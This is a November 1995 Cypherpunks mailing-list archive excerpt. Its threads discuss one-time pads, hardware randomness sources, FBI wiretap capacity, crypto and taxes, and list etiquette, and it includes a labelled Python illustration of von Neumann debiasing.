i'm interested in that the folx here think about it though, so here it is... i want a source of data for use as a otp. i don't want to have to hook up any external devices to my pc to do it. (although some of the methods mentioned in the past few days are quite interesting.) i'd like to know if there was a reason not to use the output of pgp to do it. i've been playing with the following method. i take a file and encrypt it to a key with the '-a' flag on. this generates an ascii file that is easily editable using simple, standard rexx calls. i strip the first 20 or so lines and the last 20 or so lines and put the resulting file aside. then i perform the same operation again and append the file to the previous result. i repeat until the file is sufficiently large for my purposes and then give the resulting file to the person(s) i want to have it. i still need a program to make use of the otp i've produced, but haven't gotten that far as this is still pretty much a thought experiment and something for me to waste time with. once i'm ready to make use of it i'll either find a program or attempt to write something to use to make the data i've generated useful. i would think that the output of pgp should be pretty darn random. if it isn't, then its usefulness is less than its reputation imo. as you can tell if you've read this far, i'm not a cryptographer. i just like the stuff and am working to become more proficient in its use as i think it is important if we are to maintain our privacy in an increasingly digital world. what are the holes in this? why would it be unadvisable to do it? otoh, would it be a good basis for a otp?
amp <0003701548 at mcimail.com> PGP Key = 4A2683C1 November 5, 1995 1:16 From adam at lighthouse.homeport.org Sat Nov 4 07:59:14 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sat, 4 Nov 1995 23:59:14 +0800 Subject: using pgp to make an otp In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET> Message-ID: <199511041555.KAA02171@homeport.org> | i may have posted this at some time in the past, as i have asked it | elsewhere and gotten different responses. i'm interested in that the | folx here think about it though, so here it is... I think you should read Marcus Ranum's OTP faq, on www.iwi.com:/pubs/ | i want a source of data for use as a otp. i don't want to have to | hook up any external devices to my pc to do it. (although some of the | methods mentioned in the past few days are quite interesting.) Can't be done. If you use a cipher to generate the pad, you have less than full, honest to nature entropy, and you might as well use PGP. Badly generated, or reused OTPs are very poor ciphers. | i'd like to know if there was a reason not to use the output of pgp | to do it. i've been playing with the following method. i take a file Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From perry at piermont.com Sat Nov 4 09:02:05 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 5 Nov 1995 01:02:05 +0800 Subject: video as a source of public randomness In-Reply-To: Message-ID: <199511031708.MAA08978@jekyll.piermont.com> Timothy C.
May writes: > I don't plan to belabor this point. Radioactive decay sources are > certainly fine, though not likely to be purchased by most people. Video digitization equipment connected to TV tuners turned to dead air, your suggestion, are equally unlikely to be purchased by most people. The geiger counters are very simple and cheap, too. Perry From s1113645 at tesla.cc.uottawa.ca Sat Nov 4 09:02:06 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sun, 5 Nov 1995 01:02:06 +0800 Subject: [noise] Re: censored with Perrymoose In-Reply-To: <199511031355.HAA16831@mail.socketis.net> Message-ID: On Fri, 3 Nov 1995, Gary Jeffers wrote: > Perry is again narrowly defining allowable speech on Cypherpunks. Killfiles exist. Judging by the amount of ranting, raving, paranoia and please help!!! posts, isn't it inevitable that you'll get some shut up posts too? They make for entertaining flamewars (remember "my operating system is better than yours!!"? groan ). The frequency of [noise] postings might even be considered a decent PRNG. Shut up shutting up ;-> From perry at piermont.com Sat Nov 4 09:02:25 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 5 Nov 1995 01:02:25 +0800 Subject: Physician, Heal Thyself In-Reply-To: Message-ID: <199511031738.MAA00170@jekyll.piermont.com> Timothy C. May writes: > >Tim May will doubtless disagree, but he has nothing else to do in life > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > >than read the net so his incentives to see traffic minimized aren't > >the same as other people's. > > Perry, would you please knock off the drone of snide remarks about > me? It wasn't a snide remark. I believe that the fact that you are retired and spend a considerable fraction of your day reading news and mail alters your perspective about what is reasonable. BTW, I thought I was in your kill file.
> You are often quick to say "What has this got to do with Cypherpunks?," but > you yourself are perfectly willing to rant on about Nietzsche, the East > Germans, and Louis Freeh. Physician, heal thyself. You frequently say this sort of thing, but its groundless. My Nietzsche comment was a sarcastic side remark and not a discussion of Nietzsche -- I refused, in fact, to discuss him. Mentions about the FBI's new telephony tapping requirements are on topic provided they aren't excessive, as are comments on a wide variety of cryptography and security related topics. What I object to is noise. Postings about Waco, IBM microkernel operating systems, INSLAW, and libertarianism aren't on topic. A message noting that there is a hearing in the Bernstein trial (as with John Gilmore), brief notices about the availabilty of online articles on topics of interest (as with John Young), etc, are all perfectly in order. Its when people start posting garbage that has nothing to do with local discussion (such as whether socialism is good) that I get mad. I think that this is not a difficult line to understand. Perry From tcmay at got.net Sat Nov 4 09:02:29 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 5 Nov 1995 01:02:29 +0800 Subject: video as a source of public randomness Message-ID: At 2:17 PM 11/3/95, Tim Philp wrote: > Would not generating random numbers using video sources be >suseptable to the same 'external' influences as generating random numbers >from radio static? External RF fields could skew the 'randomness' of the >data. Do a thought experiment, if not an actual experiment. Tune your t.v. to an unused channel. Use no antenna, or perhaps just small rabbit ears. Notice the swirl of snow (as in "Snow Crash"). Imagine sampling bits from this snowstorm, perhaps 10 per frame. Apply the usual tricks to remove biases in one direction or another (*) and apply hashes as desired to distill bits of entropy. 
(* Such as von Neumann's scheme to turn even biased coins into "fair" sources: toss a coin twice and let H T be a 1 and T H be a 0.)

To complete the thought experiment: Imagine the difficulty of an attacker being able to modulate this snowstorm in any predictable way. Imagine the difficulty when the antenna input has been disconnected, or the rabbit ears moved by air currents in the room, or....

"All crypto is economics." The cost of an attack based on modulating this source of randomness would be in the tens of billions of dollars, or more, and likely impossible at any cost at this time. (Depending on the sampling details, the antenna input, etc. I'm not saying a black bag job could not be done to alter the inputs to the t.v., just that external RF manipulation is unlikely in the extreme to be economically feasible.)

> As another thought, has anyone done any work on RNGs involving
>chaotic processes such as fluid dynamics and turbulent flow? I suspect
>that pressure, or other parameter variances, in turbulent flow could yield
>good random numbers. As a bonus, these parameters are easily measurable
>without special, exotic, equipment and should be inexpensive

Ignoring the work allegedly done on "chaotic encryption," the RF method described above essentially is relying on turbulence: the atmospheric variations ("spherics," "whistlers," are some of the buzz words) affect the snowstorm. Also, the rabbit ear antennas move in response to room air currents. Again, all unpredictable. (And as I noted above, sampling strategy is important...)

I don't plan to belabor this point. Radioactive decay sources are certainly fine, though not likely to be purchased by most people. (I have nothing against radioactive decay, as some of you may know--it made my career.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From llurch at networking.stanford.edu Sat Nov 4 09:14:14 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Sun, 5 Nov 1995 01:14:14 +0800
Subject: Telephone switch capacity -Reply
In-Reply-To:
Message-ID:

[about the FBI supposedly wanting the ability to tap 1% of all phones in the US simultaneously]

EPIC, CDT, and the original source confirm that they're talking about capacity, not total circuits. So what the FBI was asking for (not demanding, certainly not dictating) by early 1999 (not Oct 1998, because the ticker starts at the end of the comment period) was between 0.25% and 1% of the 10-20% of lines that the phone system can handle at once, or between 0.025% and 0.2% of the lines.

Of course the FBI doesn't have the staff to listen to all these lines, and they need an individual court order to authorize each individual interception, so this numbers game is a bit of a joke. There is no controversy about the number of wiretaps that have been authorized, except as manufactured by the Spotlight folks and other conspiracy loons. The EPIC FOIA request and lawsuit concerns the rationale for the FBI's capacity request.

It all makes a little more sense now. I had been wondering what the hell the FBI had been smoking. Something not quite as strong as the stuff the Spotlight people are smoking, it turns out.

The FBI proposal is still Not A Good Thing, and deserves your interest and opposition. See http://www.epic.org/privacy/wiretap/oppose_wiretap.html for facts and reasonable responses. The CDT's page, at http://www.cdt.org/digtel.html, is better.

-rich

From tcmay at got.net Sat Nov 4 09:17:09 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:17:09 +0800
Subject: [political NON-noise] Re: Crypto & Taxes
Message-ID:

At 1:03 AM 11/4/95, s1113645 at tesla.cc.uottawa.ca wrote:
>Not that I want to get into a big political discussion, but David Friedman
>has a nice, calm and rational book called The Machinery of Freedom, 2nd ed,
>which argues anarchism/libertarianism from an economist's point of view.
>The argument is not cased in terms of ethics and morals but rather
>economic efficiency and utility. Slim, easy to read and cheap. He also
>has a good sense of humor. Unfortunately the book is currently on back order.
>I'm holding on to my library copy until they ship one to me.

David Friedman is now teaching law at Santa Clara University, over in Silicon Valley. We've been in contact, and expect to meet for dinner sometime soon. (He attended a special Cypherpunks meeting a few years ago.)

>You can butt heads with him and Tim on the cyberia list (I don't remember
>the address but they have it at news://nntp.hks.net )

Ah, but the Cyberia list is a _law_ list, and political discussion is discouraged.

>I gather from the cyphernomicon that someone recently converted him to
>cryptoanarchy.

His "Machinery of Freedom" and many other articles clearly establish him as a leader in this area. He didn't previously know a lot about strong crypto, but now he sees that this makes many of the abstract ideas of "Machinery" near at hand. Vernor Vinge believes the same thing.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
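Added example, not part of any message in this archive: the von Neumann pairing rule and the "apply hashes to distill" step from Tim May's "video as a source of public randomness" message above, run over a simulated biased bit stream. The simulated source, its 0.80 bias, and the choice of SHA-256 as the hash are assumptions of this example.

```python
import hashlib
import math
import random


def von_neumann(bits):
    """Pairwise debiasing: (1,0) -> 1, (0,1) -> 0, (0,0) and (1,1) discarded.

    With H=1 and T=0 this is the "H T is a 1, T H is a 0" rule. The output
    is unbiased only when the input bits are independent with constant bias.
    """
    out = []
    for i in range(0, len(bits) - 1, 2):
        a, b = bits[i], bits[i + 1]
        if a != b:
            out.append(a)
    return out


def ones_fraction(bits):
    """Fraction of 1 bits in a list of 0/1 integers."""
    return sum(bits) / len(bits)


def entropy_per_bit(p):
    """Shannon entropy (bits) of one sample that is 1 with probability p."""
    if p <= 0.0 or p >= 1.0:
        return 0.0
    return -(p * math.log2(p) + (1 - p) * math.log2(1 - p))


def pack(bits):
    """Pack 0/1 integers into bytes, MSB first; a trailing partial byte is dropped."""
    out = bytearray()
    for i in range(0, len(bits) - 7, 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        out.append(byte)
    return bytes(out)


def distill(bits):
    """Condense debiased bits to a 256-bit value (SHA-256 chosen for this example)."""
    return hashlib.sha256(pack(bits)).digest()


def simulated_snow(n, p_one, seed):
    """Constructed stand-in for sampled video noise: independent, biased bits.

    A seeded software PRNG is used only so the demonstration is repeatable;
    it is not a noise source.
    """
    rng = random.Random(seed)
    return [1 if rng.random() < p_one else 0 for _ in range(n)]


def demo():
    raw = simulated_snow(200_000, 0.80, seed=1995)
    clean = von_neumann(raw)
    return {
        "raw_ones": ones_fraction(raw),             # about 0.80
        "clean_ones": ones_fraction(clean),         # about 0.50
        # Output bits per input bit: p*(1-p), about 0.16 for p = 0.80 ...
        "yield": len(clean) / len(raw),
        # ... while the raw stream carries about 0.72 bits of entropy per bit,
        # so the simple rule discards most of what the source provides.
        "raw_entropy_per_bit": entropy_per_bit(ones_fraction(raw)),
        "seed": distill(clean),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value.hex() if isinstance(value, bytes) else round(value, 4))
```

The pairing rule does nothing for correlated samples, which is why the sampling strategy matters before debiasing is applied.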
From tcmay at got.net Sat Nov 4 09:17:28 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:17:28 +0800
Subject: Many Topics are Appropriate for Discussion Here
Message-ID:

At 10:35 PM 11/3/95, hallam at w3.org wrote:
> Just a calibration point. The libertarians on the list do not seem
>to shrink from expressing their political views. Indeed the entire discussion
>on the NSA is a political thread pure and simple. My post related directly
>to the question of personal privacy rights in a democratic, plural society.
>I do not regard that it was off topic in any sense. I was not aware that
>any agreement was in effect as to the method by which goals might be
>achieved. I chose to pursue goals by the means most likely to succeed. In
>that I am a pragmatist. Government regulation often provides social benefits
>it is not by definition an evil to be avoided. In any case regardless of the
>rhetoric government regulation increases, I prefer to press for some
>regulations I like rather than dream about there being none whatsoever.

I for one have no problem with left-leaning (that is, nonlibertarian :-}) folks expressing views. That libertarians tend to be the most vocal and perhaps most articulate advocates of strong crypto is only a trend: I know of several left-leaning folks who strongly push crypto. We happen to disagree on some points, but agree on others.

On this list, Dave Mandl and Rich Dutcher (probably no longer subscribed) have represented somewhat leftist views. The late John Brunner was a particular favorite of mine, whose "Stand on Zanzibar" was an utter masterpiece, and whose "The Shockwave Rider" was of course a major influence on many cyberspace privacy advocates. And yet he called himself a leftist and was strongly opposed to the corporate state.

As I am, by the way. Much of the power of very large corporations comes from the power of the State enforcing certain franchises and monopolies granted to them.
(Intellectual property laws are largely such franchises---if one doubts this, imagine a return to the era of the guilds, where the silversmith's guild could physically block other people from smithing silver, and so on for all of the guilds. Modern intellectual property law works mostly the same way, giving to Apple or Sun or Intel the control a "truly free" market certainly would not.)

> I do not separate the question of politics from technology. My
>reasons for working on the Web have from the start been explicitly political.
>I regard the pursuit of technology without consideration of the political
>consequences to be unethical.

I agree. And though I have been called an "ethical monster" for pushing my agenda for crypto anarchy, I agree that one must always consider ethics and politics in technological matters. (I suspect we disagree about many conclusions of this view, however.)

> I am only in a position to influence the political process if I
>understand the position of the administration and can demonstrate an
>appreciation of their concerns. As Sun Tsu said "you must build a golden
>path along which your enemies may retreat". The problem with government
>is not that it is a conspiracy, it is an interlocking series of
>bureaucracies which all seek to avoid responsibility.

I view governments as just another example of an organism or system which perpetuates itself. It's in the genes. Evolutionary game theory, etc.

> If you want to get Phil Z. off the hook or foul up the government's
>escrow scheme plans you have to be prepared to step into their mindset
>and walk about on the inside a bit. somewhere inside the government there is
>a jobsworth who is deciding to hassle Phil Z., this person will be a civil
>servant, not a political appointee. Ie the dregs which get left behind each
>time there is a new administration. What we need to do is to identify that
>person and nail their ass to the wall. It has to become apparent to the
>administration that that individual has created an unnecessary source of
>embarrassment.

This I think we have already been doing a pretty good job at. I have been on panel discussions with Stewart Baker, former chief counsel of the NSA (and now with Steptoe, a D.C. law firm, and still active in pushing crypto legislation), and Ron Lee, the current chief counsel. And I spotted Dorothy Denning's deep involvement several years ago. Ditto for key escrow. And of course John Gilmore, Phil Karn, and others have been very active in "nailing their asses to the wall," so to speak.

> If someone makes continuous political spiels themselves but objects when
>I make one they disagree with (as one person has done) I am not going to take
>their objection as indicating anything other than an inability to argue their
>case.

As this post should make clear, I certainly don't object. I doubt I'll have any energy to argue things I argued for the first time almost 30 years ago, but I'm very interested in the nuts and bolts of how strong crypto will affect institutions and policies.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Sat Nov 4 09:41:51 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:41:51 +0800
Subject: Sources of randomness
Message-ID:

At 8:04 AM 11/4/95, Peter Monta wrote:
>Perhaps there ought to be a couple of standard random-bit-source
>implementations, say at the CMOS-standard-cell and board-subsystem
>levels, that are widely vetted and trusted (and used!). But it's
>mostly a solved problem, seems to me.

This is something John Gilmore called for when he wrote:

At 9:50 PM 9/20/95, John Gilmore wrote:
>Software-generated random numbers are likely to be of poor quality.
>There just isn't that much true randomness visible to computers.
>Several ways to build good hardware random number generators are
>known. But before hardware random number generators can be
>incorporated into common desktop computers, someone will have to put
>them into a small fraction of a chip.
>
>Currently, random number generators are chips or larger circuits.
>Nobody will pay to put these on a motherboard. But if a random number
>generating circuit occupied 1/1000th of a CPU chip or "multi-function
>I/O" chip, cost would not be a reason to leave it out.
>
>You probably can't build a hardware random number generator out of
>existing "gate array" gates or "standard cell" cells, because all the
>existing gates and cells are designed to behave completely
>predictably! It will take designing a new circuit structure.
>
>Do we know any solid state physics / circuit design experts who think
>this might be a fun thing to do? I bet you could get a paper out of
>it. And probably improve the world a few years later, when companies
>used your paper to close another hole in their computer security.
>
> John

There were several other posts in this thread, so interested folks might want to check the archives for this time period.
Continuing on with Peter Monta's post:

>A radioactive source might be okay at the board level (though probably
>costlier than its electronic counterpart), but it'd be a pain to
>integrate, and it might disturb the rest of the chip. (I'd like to
>have a get_random_bit instruction as part of a microprocessor, for
>example.) Also if you want a high rate of random bits, you need many
>decay events, whereas for electronic sources the corresponding
>bandwidth is free---Johnson and shot noise are flat to 1 THz or so.

I agree, for several reasons. First, I agree that electronic noise sources are easy to build, easy to get licenses for use (basically, no licenses, unless the ITAR boys decide random number generators are munitions--maybe the "This t-shirt is a munition" could have "export-controlled dice"?). Second, the ease of integration as a standard library module.

However, getting the chip companies to do this will not be easy. They generally don't see the need (hey, even _we_ don't, given the diverse opinions on what is needed).

This is why many of us favor an external dongle that plugs in somewhere. Then it could be sold cheaply and not have to get "buy-ins" from industry and committees.

One idea is something that superficially looks like a modem, as everyone has modem software and ports (though I suppose many people use internal modems and so can't easily access it.) One would attach the "RNG-modem," a little dongle, and grab noise into a buffer for processing (hashing, filtering, etc.), or as ASCII garbage.

(Before anyone jokingly asks about "1-800-RANDOMS," I've thought of it. Not practical, for obvious reasons.)

A purer approach would be just a noise source dumped into dev/random, or whatever one wishes to call it.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From llurch at networking.stanford.edu Sat Nov 4 10:07:32 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Sun, 5 Nov 1995 02:07:32 +0800
Subject: [NOISE] Re: 800_ape
In-Reply-To: <199511041323.IAA16916@pipe1.nyc.pipeline.com>
Message-ID:

On Sat, 4 Nov 1995, John Young wrote:
> 11-5-95. NYPaper Sunday Magazine:
>
> "Making Microsoft Safe For Capitalism. How do you restrain
> an 800-pound gorilla?" Cover story. By James Gleick.
>
> 'Anything not a direct lie or clearly illegal is O.K. to
> do if it advances Microsoft's tribal cause,' Mitchell
> Kapor says. 'This licenses the worst sort of
> manipulations, lies, tortured self-justification and so
> on.'

Mitch is incorrect. Microsoft considers direct lies to be OK. Witness the handling of the SMB security bugs.

I'm putting together a "Windows 95 Frequently Unanswered Questions File."

-rich

From cjl at welchlink.welch.jhu.edu Sat Nov 4 10:10:04 1995
From: cjl at welchlink.welch.jhu.edu (cjl)
Date: Sun, 5 Nov 1995 02:10:04 +0800
Subject: Real randomness generators
In-Reply-To: <9511032132.AA00195@all.net>
Message-ID:

On Fri, 3 Nov 1995, Dr. Frederick B. Cohen wrote:
>
> As a side issue, you may find that once you start sending enough
> information with truly random characteristics, you will be visited by
> people that don't want you sending it. I know people who have
> experienced these visitations and felt highly constrained as a result.

C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / )

From futplex at pseudonym.com Sat Nov 4 10:16:09 1995
From: futplex at pseudonym.com (Futplex)
Date: Sun, 5 Nov 1995 02:16:09 +0800
Subject: alt.anonymous.messages considered harmful
Message-ID: <199511032022.PAA03575@ducie.cs.umass.edu>

> >Specifically, if HTTP transactions with
> >a popular web server were routinely encrypted, then all reasonably long
> >visits to that site would act as cover traffic for a message pool on that
> >server.
>
> Qua? The "length" of the visit is just the time to download a document.
> Leaving a page in the browser window doesn't generate traffic...

You're absolutely right. I wasn't thinking sensibly about HTTP. I wanted to make an argument about the time it would take to search the pool and serve a results page. But upon reflection, I don't think that even holds up under my HTTP delusions of yesterday, let alone a realistic view. Please ignore the "reasonably long" part of my previous statement. Thanks for pointing that out.

-Futplex

From clarkm at cnct.com Sat Nov 4 10:53:55 1995
From: clarkm at cnct.com (clarkm at cnct.com)
Date: Sun, 5 Nov 1995 02:53:55 +0800
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <9511030810.AA0038@cnct-gw.new-york.net>

Thanks for this item! Two little excerpts jump out at me. They follow:

> Last year, federal and state courts authorized 1,154 wiretaps, of which 48
> percent

[snip]

> "People are starting to say that seems awfully high," Dempsey said, noting
> that
> the overall level of such surveillance activity is now a total of 20,000
> to 25,000
> intercepts nationwide over an entire year.

So what is it? 1,154 wiretaps? Or 20,000? FBI Director Louis Freeh testified under oath to 1,157. The FBI was asked for the data to support those numbers. The FBI refused to release them until the year 2002.
The FBI is being sued under FOIA to support Freeh's sworn testimony. (Of course, he used different numbers at different times....)

One last thing. What's so special about the year 2002?

.---. .----------- * :::::::::::::::::::::::::::: / \ __ / ------ * clark.matthews at paranet.org / / \(..)/ ----- * :::::::::::::::::::::::::::: ////// ' \/ ` ---- * //// / // : : --- * PERMISSION TO \\/ / * / /` '--* COPY / REPOST \*/ * //..\\ x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x '//||\\` N E M O..M E..I M P U N E..L A C E S S I T x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x

From stewarts at ix.netcom.com Sat Nov 4 10:58:28 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 02:58:28 +0800
Subject: Crypto & Taxes [WAS Re: Cybersecurity]
Message-ID: <199511030524.VAA03406@ix5.ix.netcom.com>

A couple of weeks ago, Michael Froomkin wrote:
>> > fully applied crypto (e. g. fully anonymous digital cash)
>> > makes it essentially impossible to base a tax system on income.
>Hold on. This is more "factoid" than "fact": recall that income is PAID
>by people as well as EARNED by people. Most payers have easily
>detectible physical presence and assets that can easily be attached by
>regulators. It will be a cold day before, e.g., my employer agrees not
>to report my earnings. And the same is true for most employers in most
>industries.

Unfortunately, this is true, at least for people whose employers are subject to income tax somewhere. Taxing businesses doesn't make sense economically - you could collect almost as much money with far less disruption to the underlying economy by taxing it as wages for workers and dividend or interest payments to owners* rather than inside the business itself, substantially reducing the accounting workload of businesses**.
But it's still very attractive to governments, not only as a lever for implementing social policy and extracting cooperation, but as a critical tool to force businesses to report wages paid to employees - I don't know if law.miami.edu is a taxable business, but for most employers, if they don't report the wages they paid to their employees, but do report all their revenue, they get taxed on the additional profit, instead of the employee getting hit with the tax; most people I know who've been paid "under the table" have been working for small businesses that are also not reporting cash revenues.

Of course, if a business isn't _spending_ money on employees, but is just contracting for work performed by an Anguillan corporation, they still have receipts for expenses, and the financial arrangements between the Anguillan corporation and any of its US employees aren't really their concern....

>And if it ever stops being true, we'll just get VAT, and VAT inspectors.
>So the line about death and taxes remains as true as ever, crypto or no.

Value is really hard to measure in a service economy. Most of my work over the last N years has been talking to people, typing on keyboards, going places on airplanes to talk to other people and type on other keyboards, and occasionally handing people piles of collated and stapled dead trees, a racket for which people pay my employer lots of money***. Where's the value? When was it added? If the Tax Collectors don't see people handing my employer lots of money, can they demonstrate how much money they can confiscate?

- - - - - -
* this misses payments to foreign owners and taxes on foreign customers, but any government foolish enough to discourage investment by foreigners and sales to foreign customers deserves to be blamed heavily for lost jobs..

** US businesses spend approximately 40% as much calculating taxes as they do _paying_ them...
*** My previous employer was very good at taking metal, sand, and fermented dinosaur parts, and shaping them into boxes and strings that people would give them money for; they were extremely optimistic that they could get lots of people to also pay them money for sending them people to talk about boxes and strings and getting other people to pay _them_ for talking and banging on keyboards. They shouldn't have been quite so optimistic, and now I'm in the racket on my own, having not yet acquired overseas corporations to shelter my income through :-)

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From anon-remailer at utopia.hacktic.nl Sat Nov 4 11:09:06 1995
From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request)
Date: Sun, 5 Nov 1995 03:09:06 +0800
Subject: The Crypto Applications we would rather not talk about
Message-ID: <199511041900.UAA27770@utopia.hacktic.nl>

Anonymous remailer and PGP Unusual applications

I don't know if anyone else caught it last year but High Times discovered anonymous remailers and PGP for an article last year for anonymous remote control of grow rooms. PGP Wins again? and lately the Thule people (bigoted and racist Nazis) have been learning to protect themselves also according to news reports from Germany.

Crypto and Privacy tools protect everyone from the hero to the anti-hero... the technology itself is neutral

I wonder how long it will be before we hear news reports of some of the governments people being caught using internet casinos from the white house network.

On other notes CCCF (the chaos computer club France) was shown to have had a high level plant from the French intel services, The founder of the CCCF himself. this story seems to repeat itself over and over when you are doing something of which the authorities DON'T approve they WILL attempt to infiltrate and subvert from the inside.
The answers are there and have been published in most books on tradecraft, 3 person cells organized as pyramids. Anonymous remail tech and crypto make this system possible without Face to face contact. When does this lesson finally get learned?

anon

From tcmay at got.net Sat Nov 4 11:46:48 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 03:46:48 +0800
Subject: Cypherpunks Santa Cruz Meeting/Party, 95-11-11
Message-ID:

I have sent out a detailed announcement of a "Cypherpunks Santa Cruz" meeting/party at my house in Corralitos, California, on Saturday, 11 November.

This was sent to the mailing list of interested folks I maintain. If you are on this list, you already got the detailed message. If you are interested in getting on the list, drop me a line. I can also send the detailed announcement to anyone who is interested.

As background, the Cypherpunks Santa Cruz is for folks in the Santa Cruz, Monterey, Carmel, Boulder Creek, Watsonville, Salinas, Big Sur, etc. area, or for anyone else on the Central Coast. Or anyone else, for that matter. At the last (and first) party we had Greg Broiles down from Eugene, Oregon, and Jeff Simmons up from San Luis Obispo, plus a bunch of folks from "over the hill" in the Silicon Valley/Bay Area. All told, 25 people.

I'm not sure if there is a Bay Area meeting that day. If so, attend one or the other, or both, as my party starts late afternoon (of course, it may be a long drive, depending on where the Bay Aryans are meeting).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From perry at piermont.com Sat Nov 4 11:54:30 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 5 Nov 1995 03:54:30 +0800
Subject: Sources of randomness
In-Reply-To: <199511040804.AAA03552@mage.qualcomm.com>
Message-ID: <199511041945.OAA06613@jekyll.piermont.com>

Peter Monta writes:
> But how wrong is wrong? Unless the design is catastrophically bad,
> a zener source is going to give you zener noise plus some slight
> admixture of interference. Say the designer is extremely careless
> and there's deterministic interference 20 dB down. I don't see
> how even that matters cryptographically---the resulting loss in
> entropy will be millibits per sample.
[lots elided]

As a smart EE, it's very easy for you to personally understand the design of a device you have personally constructed well enough that you can trust it. On the other hand, consider a black box Johnson noise based device that you are handed. You check the random numbers coming out; they seem roughly right. You know, of course, that the box could simply be a very clever Blum-Blum-Shub based PRNG with the seed being stored at the enemy's secret lab, and you wouldn't have any solid handle on how to determine that without taking the device apart. On the other hand, I can take a radiation detector and test it damn easily with easy to acquire calibrated sources.

> A radioactive source might be okay at the board level (though probably
> costlier than its electronic counterpart), but it'd be a pain to
> integrate, and it might disturb the rest of the chip.

Certainly you can't put such a device into a portable phone -- a Zener diode beats a geiger counter in such cases. On the other hand, a portable phone has to deal with a threat model in which there are very simple ways -- like plain eavesdropping -- to hear the conversation.
If, though, you have a large electronic bank's central key management machine in mind, the extra trouble of using an external radiation detector would probably be worthwhile, assuming you had plugged other holes, given the ease with which the system may be tested and the amount of cash at stake.

Perry

From don at cs.byu.edu Sat Nov 4 12:06:10 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Sun, 5 Nov 1995 04:06:10 +0800
Subject: Crypto++, Cpunk Icons, list noise
Message-ID: <199511041954.MAA00210@wero.byu.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai writes:
>I am still talking to RSADSI's lawyers, but it's taking a lot longer

And the efforts are appreciated. Of course, your original efforts can still be appreciated at utopia.hacktic.nl. I don't know about everyone else, but that TCP encryption sounded interesting. Any plans to discuss it on the list?

- -----

An anonymous complainer writes:
>Well, Perry, my opinion is that there is far too much noise on this list
>as it is. I have already seen my words drowned out by bellyaching over
>next to nothing.

POT-KETTLE-BLACK. Also, since nothing you've written (in your commentary, as opposed to anonymous announcements or releases that most people use anonymity for here) indicates that you're using anonymity for any particular reason, please stop so people can killfile you. Or send it from a nym at alpha.c2.org. I mean, the NSA has your real name anyway, what's the point...

- ---------

Jay Campbell writes:
>>masquerade as Injuns in the 1800's and waylay Pony Express riders in order
>> ^^^^^^
>>I think you'll find the NSA was not in existence in the 1800's.
>I'm disappointed at the sheer number of similar pieces of email I received
>on this. You'da thought the Capn Crunch reference was silly enough that
>people would give me a funny look and trash the original message.

Hmm, I guess most of them at least had the sense to not send it to the list. The list still sees FAR too many personal queries and rebuttals.
TO THE GUILTY: take your bonehead replies to email please.

Jay: I had a similar experience when I mentioned elsewhere that all the primes under 1000 digits were really invented by the NSA over 20 years ago. I recommended wearing garlic around the neck for protection...

